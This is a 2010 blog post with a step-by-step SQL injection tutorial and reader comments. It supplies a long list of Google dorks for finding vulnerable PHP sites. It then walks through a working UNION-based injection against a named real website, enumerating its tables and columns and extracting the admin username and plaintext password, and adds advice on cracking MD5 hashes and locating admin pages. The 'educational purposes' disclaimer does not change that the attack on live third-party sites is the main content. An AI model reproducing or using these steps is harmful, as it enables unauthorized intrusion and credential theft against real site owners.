Sunday, October 24, 2010

||Website hacking using SQL INJECTION||


Hey Guys this the best TUT that i can write about sql injection for all u guys. Hope u like it


You Yourself are responsible for what you do with this information, it is provided for educational purposes only.


Before we even start, you need some tools.
HackBar [FireFox]
Dowload link
https://addons.mozilla.org/firefox/addon/3899
 ||OR ||
You can use this website
http://home2.paulschou.net/tools/xlate/


Admin Finder
[We wont be using the AdminFinder in this tut, but you WILL need it]
ADmin FInder
Download link
http://uploading.com/files/KCDVDDST/admi...r.rar.html


or
Pearl FInder
1)FIrst download and install this
http://rapidshare.com/files/426832341/ActivePerl-5.10.1.1006-MSWin32-x86-291086__1_.msi


2)Second download this n extract files in c Drive
http://rapidshare.com/files/426832625/admin_login_finder_in_perl_language.rar


Now, we need a site. To find a site, we need to go to Google, and put in one of the following.
allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=



allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
allinurl:profile_view.php?id=
allinurl:category.php?id=
allinurl:publications.php?id=
allinurl:fellows.php?id=
allinurl:downloads_info.php?id=
allinurl:prod_info.php?id=
allinurl:shop.php?do=part&id=
allinurl:productinfo.php?id=
allinurl:collectionitem.php?id=
allinurl:band_info.php?id=
allinurl:product.php?id=
allinurl:releases.php?id=
allinurl:ray.php?id=
allinurl:produit.php?id=
allinurl:pop.php?id=
allinurl:shopping.php?id=
allinurl:productdetail.php?id=
allinurl:post.php?id=
allinurl:viewshowdetail.php?id=
allinurl:clubpage.php?id=
allinurl:memberInfo.php?id=
allinurl:section.php?id=
allinurl:theme.php?id=
allinurl:page.php?id=
allinurl:shredder-categories.php?id=
allinurl:tradeCategory.php?id=
allinurl:product_ranges_view.php?ID=
allinurl:shop_category.php?id=
allinurl:transcript.php?id=
allinurl:channel_id=
allinurl:item_id=
allinurl:newsid=
allinurl:trainers.php?id=
allinurl:news-full.php?id=
allinurl:news_display.php?getid=
allinurl:index2.php?option=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:newsone.php?id=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:aboutbook.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:pages.php?id=
allinurl:clanek.php4?id=
allinurl:announce.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:viewapp.php?id=
allinurl:viewphoto.php?id=
allinurl:rub.php?idr=
allinurl:galeri_info.php?l=
allinurl:review.php?id=
allinurl:iniziativa.php?in=
allinurl:curriculum.php?id=
allinurl:labels.php?id=
allinurl:story.php?id=
allinurl:look.php?ID=
allinurl:newsone.php?id=
allinurl:aboutbook.php?id=
To check if a site is vulnerable, put a ' after it, like so:
Code:
http://www.site.com/news.php?id=5'
You should get an SQL error, like this one:
Code:
PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\Domains\tartanarmy.com\wwwroot\news\news.php on line 19 PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\Domains\tartanarmy.com\wwwroot\news\news.php on line 25


Okay, Now that you have your vulnerable site, Ill show you how to do an SQL injection on it.
Ill be doing my injection on 
Code:
http://pakistanbodycount.org/news_detail.php?id=46


So, I pull up my site, and I add a ' after it, and I get ERROR.


Remember, when checking the vulnerability, an error is a good thing.
Now, I need to find out how many columns are in the site. So I start with:
Code:
http://pakistanbodycount.org/news_detail.php?id=46 order by 3
Always start with 3, because a site has to have atleast 3 columns. If you get an error at 3, then your target site doesnt support union statements.
When I order by 3 the page loads normally


So the site has more than 3 columns. Thats a good sign. After 3, I always go to ten. 
So:
http://pakistanbodycount.org/news_detail.php?id=46 order by 10


and we get an error
So the site has less than 10 columns.
Now will see actually how many columns are there
No order by 3 to order by 4 untill we get some error
it turns out  to be that we get error when we put order by 6
Code: http://pakistanbodycount.org/news_detail.php?id=46 order by 6


So we get an error on 6 that means we have 5 columns
So now we need to know which of those columns are vulnerable. So we do this
http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2,3,4,5


NOTICE THE - IN FRONT OF THE 46. It is very important and needs to be there every time you do a Union select statement.


So no on site you would see some numbers
3,2,4




Columns 3,2,and 4 are vulnerable.
Now we have to find out the SQL version of the site. Version 5 is our favorite, because it has information.schema. Information.schema is our friend, because it tells us things. Meaning we dont have to guess the table names, like we would in version 4. So to find out what version our site is running, we do this : 
http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2,@@version,4,5


Yay! Our site is running version 5. So how are we gonna get the tables? Just like this.
Code
http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema= database ()


So now on our site we see this
admin,blasts,drones,last_update,news,page


See where it says admin? Thats what we want. But how are we gonna get the info thats in there? Like this. *If you downloaded the hackbar, like I told you to, your gonna need it*
Code:-
http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name= admin


So, admin is what we want to get into, but putting it just like that wont work. We need too convert it into CHAR (). The HackBar can do that. Highlight what you want to turn into CHAR () and click MySQL, then MYSQL CHAR (). 
Code:-
CHAR(97, 100, 109, 105, 110)


OR SECOND OPTION IS WEBSITE GO TO THAT WEBSITE
Put admin in Text n press encode
now see in 5th box [ DEC / CHAR ]
you will see some numbers like this
97 100 109 105 110
jus convert this no to this format
CHAR(97, 100, 109, 105, 110)


So the whole thing is :
http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name= char(97, 100, 109, 105, 110)
So we see this
idadmin,username,password 


Out of that, we want the username and password, right? So, to get that, we do this :
http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2,group_concat(username,0x3a,password),4,5 from admin


0x3a is the Hex for a colon, so dont worry about that.
When we input that, our site shows us this :
  
 admin:monalisa 


we are lucky that the password in no encrypted... But on most of the site it is
at dat use any md5 decrypt website(make a googlr search ull fina a lot) or se Cain And Abel or John The Ripper (linux) to crack md5. but if your luck is bad somtimes encryption is salted which is really hard to break
And use admin finder or pearl finder to find the admin page


Note:- The admin page of this website cannot be found now as this website was hacked earlier and they have changed the admin page
I hope you enjoyed my tutorial,this is the simplest that i could write. and I hope that this works for everyone. Post comments and thanks here.For any doubt pls send me a friend request..pls dont snd me any of ue question in my inbox.
Regards,
AV

5 comments:

  1. Hi AV i recently started following your blog and i honestly feel when something becomes this big you should explain in parts, that will become easy and more helpful. Thanks for nice work.

    ReplyDelete
  2. @Nrupen Masram...thnks for suggestion..ill keep in mind ur suggestion nxt tym....n keep commenting so dat i can help u all...:))

    ReplyDelete
  3. gud work AV mjhe lg rha hai ankit fadia ki tara AV b trademark na bn jaye

    ReplyDelete
  4. bhai i wanna learn to basic what should i do yeh to mere uper se guzar gai

    ReplyDelete